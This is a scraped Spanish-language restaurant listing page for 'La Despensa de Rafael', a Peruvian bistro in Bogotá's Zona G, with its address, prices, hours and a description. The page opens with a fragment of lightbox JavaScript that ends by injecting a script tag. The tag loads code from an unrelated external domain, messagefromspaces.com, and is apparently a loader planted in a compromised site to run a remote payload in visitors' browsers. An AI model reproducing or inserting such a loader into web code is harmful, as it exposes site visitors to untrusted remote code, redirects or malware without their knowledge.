, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
La despensa de Rafael

Dirección: Calle 70A No. 9-95, esquina  Zona G y Quinta Camacho
Zona:
Zona G
Precio Promedio Plato por Persona: 
Entre 20.000  y 30.000 pesos
Formas de Pago: 
Recibe Todas las Tarjetas
TELÉFONO DE RESERVAS:   744 90 97

Categoría: Peruano

Es un restaurante ubicado en la Zona G, especializado en cocina peruana tipo bistró. La calidad de la comida y el ambiente sencillo pero con un toque formal, hace que sus comensales vuelvan a seguir disfrutando de platos deliciosos con ingredientes de primera calidad derivados de la pesca artesanal.

En una antigua casa esquinera en la zona G de la ciudad, en el barrio Quinta Camacho se inauguró el pasado 9 de Julio ”La Despensa de Rafael”. Con un estilo muy rústico tipo bistrot, la decoración del lugar es bastante agradable a la vista, cuenta con una zona de fumadores y un bar en la parte de afuera. Al ingresar al sitio podrán encontrar en primer lugar la despensa de vinos; en la parte izquierda al fondo esta la cocina, cabe aclarar que se puede ver lo que se está preparando, además de varias mesas con sofás y sillas, al igual que en la parte derecha interna.

Horarios de atención:
Lunes a Sábado de 12:30 p.m. a 11:00 p.m.

Comedor

Bar

La Despensa de Rafael

Deja un comentario